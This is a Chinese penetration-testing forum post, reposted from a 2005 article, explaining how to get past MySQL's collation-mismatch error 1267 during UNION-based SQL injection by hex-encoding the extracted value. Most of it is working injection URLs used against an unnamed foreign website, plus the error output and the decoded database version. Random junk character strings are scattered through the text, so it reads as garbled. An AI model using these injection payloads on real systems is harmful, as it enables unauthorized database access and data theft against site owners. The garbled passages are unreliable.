中国网络渗透测试联盟

标题: MySQL注射时ErrorNo.1267的突破 [打印本页]

---

作者: admin    时间: 2012-9-15 14:04
标题: MySQL注射时ErrorNo.1267的突破
本文作者：SuperHei
文章性质：原创
$ Y4 y* E. Z- {发布日期：2005-10-18
. i: F- U' T6 K5 @测试个国外的站时：
url：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
返回错误：
0 a4 ]# d9 i: P7 F  c, t& z/ XIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
3 L4 b- a/ t# ^. V解决办法：转为其他编码如hex。
2 P) [7 l0 {: y! Eurl：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
成功得到hex(version())的值为：
' i" Z# P* p( |; B9 B, P' O+ C342E312E332D62657461
回Mysql查询下得到：
; {" G9 h" t; N7 vmysql> select 0x342E312E332D62657461;
* G0 s. u8 m( O; b( p" K+------------------------+
| 0x342E312E332D62657461 |
& g* B# s3 l4 F3 Y* ?" I+------------------------+
| 4.1.3-beta |
+------------------------+
0 x7 P" g3 A3 t/ `0 s1 row in set (0.00 sec)

* Z7 X  i" Y8 a% O6 D

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2